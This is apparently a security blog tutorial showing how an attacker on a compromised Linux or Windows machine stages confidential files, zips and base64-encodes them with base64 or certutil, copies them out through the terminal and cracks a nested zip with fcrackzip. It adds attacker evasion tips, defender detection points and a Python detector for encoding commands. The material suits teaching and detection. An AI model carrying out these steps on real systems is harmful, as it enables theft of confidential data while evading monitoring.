Data Exfiltration with Base64

A well-defended network and a properly trained security professional have many opportunities to detect and stop malicious actors. Each layer of activity found in the MITRE ATT&CK Matrix is a chance for the malicious actor to trip an alarm. A malicious cyber attack only needs to be detected and stopped in one of the stages to protect your company from the dreaded data spillage report.

Att&ck Matrix

The MITRE ATT&CK Matrix includes the following tactics: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, and Exfiltration. This gives us defenders many shots at getting the correct network visibility and alarms in place so that action can be taken in an automated way.

Exfiltration Technique

In this scenario we have compromised the target machine and located confidential files we are interested in exfiltrating from the company.

Linux

kali@targetmachine:~/Desktop/secretstuff$ ls
secretfile1.txt  secretfile2.txt  secretfiles.zip  secretplans.pdf

First I just created a directory called “allsecrets” and then moved all the files into it. Copying would be more discreet, but check the current storage usage of the compromised machine before duplicating any files or folders.

kali@targetmachine:~/Desktop/secretstuff$ mkdir allsecrets
kali@targetmachine:~/Desktop/secretstuff$ mv * allsecrets
mv: cannot move 'allsecrets' to a subdirectory of itself, 'allsecrets/allsecrets'
kali@targetmachine:~/Desktop/secretstuff$ ls
allsecrets

Next let's zip the contents of the new folder with a strong password.

kali@targetmachine:~/Desktop/secretstuff$ zip -e -r allthesecrets.zip allsecrets
Enter password: 
Verify password: 
updating: allsecrets/ (stored 0%)
updating: allsecrets/secretplans.pdf (deflated 6%)
updating: allsecrets/secretfiles.zip (stored 0%)
updating: allsecrets/secretfile2.txt (stored 0%)
updating: allsecrets/secretfile1.txt (stored 0%)
kali@targetmachine:~/Desktop/secretstuff$ ls
allsecrets  allthesecrets.zip

Now we can encode the entire .zip as a base64 string and write it to a file called “encodedstring.txt”.

kali@targetmachine:~/Desktop/secretstuff$ cat allthesecrets.zip | base64 > encodedstring.txt
kali@targetmachine:~/Desktop/secretstuff$ ls
allsecrets  allthesecrets.zip  encodedstring.txt
kali@targetmachine:~/Desktop/secretstuff$ tail encodedstring.txt

Windows

Here we are connected to the target machine using evil-winrm.

root@kali:/home/kali# evil-winrm -u someuser -p blahblah -i 192.168.1.78

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\someuser\Documents>

Files for exfiltration discovered.

*Evil-WinRM* PS C:\Users\someuser\Documents> dir


    Directory: C:\Users\someuser\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        7/18/2020   6:57 PM             28 secretfile1.txt
-a----        7/18/2020   6:57 PM             28 secretfile2.pdf
-a----        7/18/2020   6:58 PM             28 secretfile3.zip

Make the directory named “allthesecrets” and move all the files inside.

*Evil-WinRM* PS C:\Users\someuser\Documents> mkdir allthesecrets


    Directory: C:\Users\someuser\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/18/2020   6:59 PM                allthesecrets


*Evil-WinRM* PS C:\Users\melanie\Documents> mv secret* ./allthesecrets

Compress the new directory.

*Evil-WinRM* PS C:\Users\someuser\Documents> Compress-Archive -LiteralPath allthesecrets -DestinationPath ./allsecrets.zip
*Evil-WinRM* PS C:\Users\someuser\Documents> dir


    Directory: C:\Users\someuser\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/18/2020   6:59 PM                allthesecrets
-a----        7/18/2020   7:04 PM            505 allsecrets.zip

Using certutil we can encode the .zip with base64 and output the encoded data to “allsecrets.temp”.

*Evil-WinRM* PS C:\Users\someuser\Documents> certutil -encode allsecrets.zip allsecrets.temp
Input Length = 505
Output Length = 754
CertUtil: -encode command completed successfully.

Showing raw encoding.

*Evil-WinRM* PS C:\Users\someuser\Documents> type allsecrets.temp
-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----

Remove the first and last lines of the encoded data (the certificate header and footer) so it can be decoded on our attacking machine.

kali@kali:~/Documents/trenchesofit$ cat copiedb64.txt

Windows & Linux

Now we can simply cat the contents to the terminal, copy the string, and decode it on a local machine. Once the base64 content had been copied to the local machine, I had to do some minor format fixes with the first command. This is because we are copying directly from the terminal, which helps minimize detection but also grabs any newlines, carriage returns, and spaces.

kali@kali:~$ tr -d ' \r\n' < copiedbase64.txt > finaloutput.txt
kali@kali:~/Documents/trenchesofit$ base64 --decode finaloutput.txt > allthesecrets.zip

Unzip the file with the password given on the target machine.

kali@kali:~$ unzip allthesecrets.zip 
Archive:  allthesecrets.zip
   creating: allsecrets/
[allthesecrets.zip] allsecrets/secretplans.pdf password: 
  inflating: allsecrets/secretplans.pdf  
 extracting: allsecrets/secretfiles.zip  
 extracting: allsecrets/secretfile2.txt  
 extracting: allsecrets/secretfile1.txt

There we go! Now we have the secret documents secured on the attacking machine. From here we can continue to analyze the protected files. As we can see, one of the files we pulled is itself a password-protected zip.

kali@kali:~/allsecrets$ unzip secretfiles.zip
Archive:  secretfiles.zip
[secretfiles.zip] file1.txt password:

We can run a quick fcrackzip on the password protected zip.

kali@kali:~/allsecrets$ fcrackzip -D -p /home/kali/tools/rockyou.txt secretfiles.zip
possible pw found: test ()
kali@kali:~/allsecrets$ unzip secretfiles.zip 
Archive:  secretfiles.zip
[secretfiles.zip] file1.txt password: 
 extracting: file1.txt               
 extracting: file2.txt               
 extracting: this.txt

Attacker's Perspective

So from the attacker's perspective, watch for the triggers of anomalous behavior, such as moving multiple key files. As I said, copying may be an option if the valuable files are small enough not to cause hard drive anomalies or storage issues. This exfiltration method is just “living off the land”, and most defenders are not alerting on base64 usage.

Defender's Perspective

From a defender's perspective we have a couple of opportunities to catch this activity, the most obvious being the initial connection to the machine. Another is integrity monitoring on key files within the servers, which would trigger an alert if changes are made to specific directories or files that you know should only change on a schedule or through the company's change process. The other detection point is alerting on the use of base64 (and certutil -encode on Windows) on the command line. This may not work for every environment, but it is up to the security professionals to recognize what deviates from normal activity within their environment and alert on that behavior.
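As an added example that is not part of the original post, the two command-line detection points above, worked through in Python: a classifier that tags process command lines where an archive is base64-armored (base64 on Linux, certutil -encode on Windows) or a password-protected zip is created, plus a check that tells certutil's fake CERTIFICATE armor around a zip apart from a real certificate. The command lines and the zip it builds are constructed samples, and the tag names are my own.

```python
import base64
import io
import re
import zipfile

# Detection helpers for this post's technique. The log lines and the zip used in
# the tests are constructed samples; the regexes are assumptions, not a vendor rule.
ARCHIVE_EXT = re.compile(r"\.(zip|7z|rar|tar|tgz|gz)\b", re.I)
PEM_BODY = re.compile(r"-----BEGIN CERTIFICATE-----\s*(.*?)\s*-----END CERTIFICATE-----", re.S)
ZIP_MAGIC = b"PK\x03\x04"   # ZIP local file header; DER certificates start with 0x30 instead


def classify_command(cmdline):
    """Return detection tags for one process command line (empty list = no finding)."""
    low = cmdline.lower()
    tags = []
    if "certutil" in low and "-encode" in low:
        tags.append("certutil_encode")
    if re.search(r"\bbase64\b", low) and not re.search(r"(--decode|\s-d)\b", low):
        tags.append("base64_encode")
    if tags and ARCHIVE_EXT.search(low):
        tags.append("archive_encoded")          # encoding an archive is the strong signal
    if re.search(r"\bzip\s+-\w*e", low):        # zip -e / -er: password-protected archive
        tags.append("encrypted_archive_created")
    return tags


def pem_payload_kind(text):
    """Classify what a CERTIFICATE-armored blob actually decodes to."""
    m = PEM_BODY.search(text)
    if not m:
        return "no_pem"
    try:
        raw = base64.b64decode("".join(m.group(1).split()), validate=True)
    except ValueError:
        return "invalid_base64"
    if raw.startswith(ZIP_MAGIC):
        return "zip_archive"                    # what certutil -encode of a .zip produces
    return "der_certificate" if raw[:1] == b"\x30" else "other_binary"


def certutil_style_armor(data):
    """Constructed stand-in for certutil -encode output: 64-char lines between headers."""
    b64 = base64.b64encode(data).decode()
    body = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return "-----BEGIN CERTIFICATE-----\n" + body + "\n-----END CERTIFICATE-----\n"


def sample_zip_bytes():
    buf = io.BytesIO()                          # constructed sample archive, built offline
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("secretfile1.txt", "constructed sample content\n")
    return buf.getvalue()
```

Feed `classify_command` the command-line field of your process-creation telemetry (Sysmon event 1, auditd execve) and run `pem_payload_kind` over new files that carry a CERTIFICATE header outside the usual certificate stores.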

Data exfiltration is the defender's last chance at stopping an adversary before data spillage occurs. Ensure proper controls are in place to detect similar exfiltration methods so you are not one of the companies having to publish that data breach report.

Feel free to reach out with any questions or comments, and until next time, stay safe in the Trenches of IT!
